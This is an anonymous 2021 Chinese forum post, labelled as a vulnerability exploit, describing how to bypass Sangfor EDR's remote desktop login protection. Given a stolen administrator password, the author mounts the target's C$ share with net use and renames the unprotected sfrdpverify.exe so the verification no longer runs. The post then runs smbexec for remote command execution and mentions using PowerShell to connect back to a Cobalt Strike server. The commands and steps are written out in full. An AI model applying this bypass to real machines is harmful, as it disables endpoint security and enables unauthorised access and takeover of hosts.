请选择 进入手机版 | 继续访问电脑版
查看: 4028|回复: 0

【漏洞利用】深信服EDR远程桌面登录保护绕过

[复制链接]
匿名
匿名  发表于 2021-2-20 17:10:36 |阅读模式
0x01 简述

在某次项目中,通过一些渗透手段拿到了靶标服务器的管理员密码,但是在登陆服务器时,弹出深信服EDR的远程登陆保护界面,要求输入验证密码

微信截图_20210220142413.png

本地搭建深信服EDR,通过对比进程后发现,远程登录保护认证功能是由sfrdpverify进程实现的

路径:
[Shell] 纯文本查看 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe


并且此文件无权限保护,可进行增删改操作。

0x02 绕过验证

在已知管理员密码的情况下,可通过net use挂载对方C盘

命令:
[Shell] 纯文本查看 复制代码
net use \\192.168.1.1\C$ pass /user:administrator


2.png

对sfrdpverify.exe文件进行删除或改名操作,修改为

[Shell] 纯文本查看 复制代码
C:\Program Files\Sangfor\EDR\agent\bin\sfrdpverify.exe.1


3.png

修改完成后,再次登录远程桌面,即可绕过深信服EDR远程验证保护

4.png

也使用psexec、wmiexec、smbexec等方式进行交互

命令:
[Shell] 纯文本查看 复制代码
python smbexec.py ./user:pass@192.168.1.1


5.png

通过执行powershell命令上线cs服务端后再进行操作

6.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表